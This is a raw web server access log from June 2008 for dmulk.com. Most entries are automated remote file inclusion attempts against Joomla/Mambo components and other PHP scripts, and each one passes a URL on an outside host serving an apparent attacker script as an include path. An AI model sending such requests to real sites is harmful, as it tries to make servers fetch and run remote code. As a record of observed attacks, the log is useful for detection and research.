211.32.116.114 - - [17/Jun/2008:11:47:04 -0700] "GET //admin/addons/archive/archive.php?adminfolder=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
211.32.116.114 - - [17/Jun/2008:11:47:05 -0700] "GET /logs/access_080312.log//admin/addons/archive/archive.php?adminfolder=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:11:47:09 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:11:47:10 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.174.65.190 - - [17/Jun/2008:11:47:16 -0700] "GET /logs/access_080404.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [17/Jun/2008:11:47:22 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.114.74 - - [17/Jun/2008:11:47:26 -0700] "GET //administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.fingerxs.eu/modules/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.5.10 - - [17/Jun/2008:11:47:39 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
70.86.5.10 - - [17/Jun/2008:11:47:41 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 200 18505 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
81.174.65.190 - - [17/Jun/2008:11:47:43 -0700] "GET /logs/access_080321.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/errors.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:47:52 -0700] "GET /logs/access_080228.log//errors.php?error=http://nicosahputra.ueuo.com/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:47:52 -0700] "GET /logs//errors.php?error=http://nicosahputra.ueuo.com/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:11:48:04 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [17/Jun/2008:11:48:05 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.236.177.197 - - [17/Jun/2008:11:48:11 -0700] "GET /logs/access_080308.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "dmulk.com"
211.236.177.197 - - [17/Jun/2008:11:48:12 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "dmulk.com"
211.236.177.197 - - [17/Jun/2008:11:48:12 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "dmulk.com"
66.98.224.22 - - [17/Jun/2008:11:48:13 -0700] "GET //mcf.php?content=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
66.98.224.22 - - [17/Jun/2008:11:48:23 -0700] "GET /logs//mcf.php?content=http://www.geocities.com/anna.risma/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
211.234.98.113 - - [17/Jun/2008:11:49:10 -0700] "GET /logs/access_080308.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "dmulk.com"
211.234.98.113 - - [17/Jun/2008:11:49:10 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "dmulk.com"
211.234.98.113 - - [17/Jun/2008:11:49:10 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "dmulk.com"
211.115.110.116 - - [17/Jun/2008:11:49:17 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "dmulk.com"
211.115.110.116 - - [17/Jun/2008:11:49:17 -0700] "GET /logs/access_080308.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "dmulk.com"
211.115.110.116 - - [17/Jun/2008:11:49:17 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "dmulk.com"
209.51.219.170 - - [17/Jun/2008:11:50:32 -0700] "GET /logs/access_080507.log//ashnews.php?pathtoashnews=http://schirrwagen.info/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [17/Jun/2008:11:50:33 -0700] "GET //ashnews.php?pathtoashnews=http://schirrwagen.info/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [17/Jun/2008:11:50:33 -0700] "GET /logs//ashnews.php?pathtoashnews=http://schirrwagen.info/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [17/Jun/2008:11:50:37 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=http://schirrwagen.info/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.81.233 - - [17/Jun/2008:11:50:57 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "dmulk.com"
211.32.116.114 - - [17/Jun/2008:11:51:07 -0700] "GET /logs/access_080308.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "dmulk.com"
211.32.116.114 - - [17/Jun/2008:11:51:07 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "dmulk.com"
211.32.116.114 - - [17/Jun/2008:11:51:08 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://88.208.236.212:85/temp/l33b1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "dmulk.com"
74.6.22.107 - - [17/Jun/2008:11:51:34 -0700] "GET /blog/index.php/2008/06/09/ HTTP/1.0" 200 6622 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:51:34 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nicosahputra.ueuo.com/new.txt??? HTTP/1.1" 200 18501 "-" "libwww-perl/5.805" "www.dmulk.com"
210.120.128.65 - - [17/Jun/2008:11:51:54 -0700] "GET /logs/access.log/index3.php?acr=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.120.128.65 - - [17/Jun/2008:11:51:54 -0700] "GET /logs/index3.php?acr=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.120.128.65 - - [17/Jun/2008:11:51:55 -0700] "GET /logs/access_080215.log/index3.php?acr=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.120.128.65 - - [17/Jun/2008:11:51:58 -0700] "GET /index3.php?acr=http://skill-station.net/help/id5.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.12.53.176 - - [17/Jun/2008:11:52:00 -0700] "GET /logs/access_080225.log//errors.php?error=http://nicosahputra.ueuo.com/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.110.101.219 - - [17/Jun/2008:11:52:04 -0700] "GET /logs/access_080507.log//ashnews.php?pathtoashnews=http://www.stoneponyband.com/horns/aed-per1.0.0/generatedFiles/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.110.101.219 - - [17/Jun/2008:11:52:05 -0700] "GET //ashnews.php?pathtoashnews=http://www.stoneponyband.com/horns/aed-per1.0.0/generatedFiles/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.110.101.219 - - [17/Jun/2008:11:52:05 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.stoneponyband.com/horns/aed-per1.0.0/generatedFiles/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.110.101.219 - - [17/Jun/2008:11:52:07 -0700] "GET /logs/access_080331.log//ashnews.php?pathtoashnews=http://www.stoneponyband.com/horns/aed-per1.0.0/generatedFiles/license.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
64.15.129.23 - - [17/Jun/2008:11:52:45 -0700] "GET /logs/access_080429.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?error=http://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.249.73.161 - - [17/Jun/2008:11:53:52 -0700] "GET /logs/access.log HTTP/1.1" 200 285812 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:11:54:34 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:11:54:34 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.254.214.2 - - [17/Jun/2008:11:54:39 -0700] "GET /logs//main.php?pagina=http://super4host.com/gha-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.254.214.2 - - [17/Jun/2008:11:54:44 -0700] "GET //main.php?pagina=http://super4host.com/gha-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [17/Jun/2008:11:54:54 -0700] "GET /logs/access_071219.log//components/com_simpleboard/image_upload.php?sbp=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [17/Jun/2008:11:54:54 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [17/Jun/2008:11:55:29 -0700] "GET /logs/access_080118.log//components/com_simpleboard/image_upload.php?sbp=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.74.158.86 - - [17/Jun/2008:11:55:56 -0700] "GET /logs/access_080123.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://bucetinha.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.74.158.86 - - [17/Jun/2008:11:55:57 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://bucetinha.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.74.158.86 - - [17/Jun/2008:11:55:57 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://bucetinha.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:11:56:13 -0700] "GET /logs/Scan%20mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%20%22/mambots/content/%22%20de%20%22/mambots/content/%22%20dehhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.18.228 - - [17/Jun/2008:11:56:14 -0700] "GET /presto/?D=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:11:56:14 -0700] "GET /Scan%20mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%20%22/mambots/content/%22%20de%20%22/mambots/content/%22%20dehhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:11:56:18 -0700] "GET /logs/Scan%20mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%20%22/mambots/content/%22%20de%20%22/mambots/content/%22%20dehhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:11:56:18 -0700] "GET /Scan%20mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%20%22/mambots/content/%22%20de%20%22/mambots/content/%22%20dehhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:11:56:24 -0700] "GET /logs/Scan%20mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%20%22/mambots/content/%22%20de%20%22/mambots/content/%22%20dehhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:11:56:24 -0700] "GET /Scan%20mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%20%22/mambots/content/%22%20de%20%22/mambots/content/%22%20dehhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:11:56:38 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:11:57:41 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.67.20.173 - - [17/Jun/2008:11:57:49 -0700] "GET /newsletter/newsletter.php?waroot=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
80.67.20.173 - - [17/Jun/2008:11:57:49 -0700] "GET /logs/newsletter/newsletter.php?waroot=http://www.immo-marrakech.com/files/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
72.29.81.233 - - [17/Jun/2008:11:57:54 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.81.233 - - [17/Jun/2008:11:57:54 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
71.160.126.83 - - [17/Jun/2008:11:57:59 -0700] "GET /logs/access_071115.log HTTP/1.1" 200 56806 "http://search.msn.com/results.aspx?q=00987.jpg&first=361&FORM=PERE5" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
71.160.126.83 - - [17/Jun/2008:11:57:59 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:11:58:24 -0700] "GET /logs/access_080228.log/Scan%20mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%20%22/mambots/content/%22%20de%20%22/mambots/content/%22%20dehhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:11:58:25 -0700] "GET /logs/access_080228.log/Scan%20mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%20%22/mambots/content/%22%20de%20%22/mambots/content/%22%20dehhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.195.72.156 - - [17/Jun/2008:11:58:31 -0700] "GET /logs/access_080507.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.72.156 - - [17/Jun/2008:11:58:31 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.195.72.156 - - [17/Jun/2008:11:58:32 -0700] "GET /logs/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:11:58:33 -0700] "GET /logs/access_080228.log/Scan%20mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%20%22/mambots/content/%22%20de%20%22/mambots/content/%22%20dehhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.18.228 - - [17/Jun/2008:11:58:52 -0700] "GET /logs/access_080312.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:11:59:08 -0700] "GET /logs/access_071220.log/Scan%20mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%20%22/mambots/content/%22%20de%20%22/mambots/content/%22%20dehhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:11:59:08 -0700] "GET /logs/access_071220.log/Scan%20mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%20%22/mambots/content/%22%20de%20%22/mambots/content/%22%20dehhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.55.179.18 - - [17/Jun/2008:11:59:09 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fc13.fr/ultrastats/include/help.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
72.55.179.18 - - [17/Jun/2008:11:59:09 -0700] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.fc13.fr/ultrastats/include/help.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
82.56.44.1 - - [17/Jun/2008:11:59:13 -0700] "GET /logs/access_071220.log/Scan%20mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=%20%22/mambots/content/%22%20de%20%22/mambots/content/%22%20dehhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.219.217.74 - - [17/Jun/2008:11:59:35 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.73.161 - - [17/Jun/2008:11:59:35 -0700] "GET /logs/access_080126.log HTTP/1.1" 200 758621 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
200.74.158.86 - - [17/Jun/2008:11:59:41 -0700] "GET /logs/access_080124.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://bucetinha.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:12:01:27 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [17/Jun/2008:12:01:28 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:01:53 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
87.106.53.194 - - [17/Jun/2008:12:01:53 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
213.219.217.74 - - [17/Jun/2008:12:01:53 -0700] "GET /logs/access_080313.log/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Jun/2008:12:01:54 -0700] "GET /errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Jun/2008:12:01:54 -0700] "GET /logs/errors.php?error=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.249.73.161 - - [17/Jun/2008:12:01:57 -0700] "GET /logs/access_080507.log HTTP/1.1" 200 3350468 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
89.108.67.119 - - [17/Jun/2008:12:02:20 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [17/Jun/2008:12:02:27 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.bicarabuku.com/mambots/system/sql.txt? HTTP/1.1" 200 18521 "-" "libwww-perl/5.805" "www.dmulk.com"
65.42.183.2 - - [17/Jun/2008:12:02:29 -0700] "GET /logs/access_080117.log/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://www.proostjes.be/calendar/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
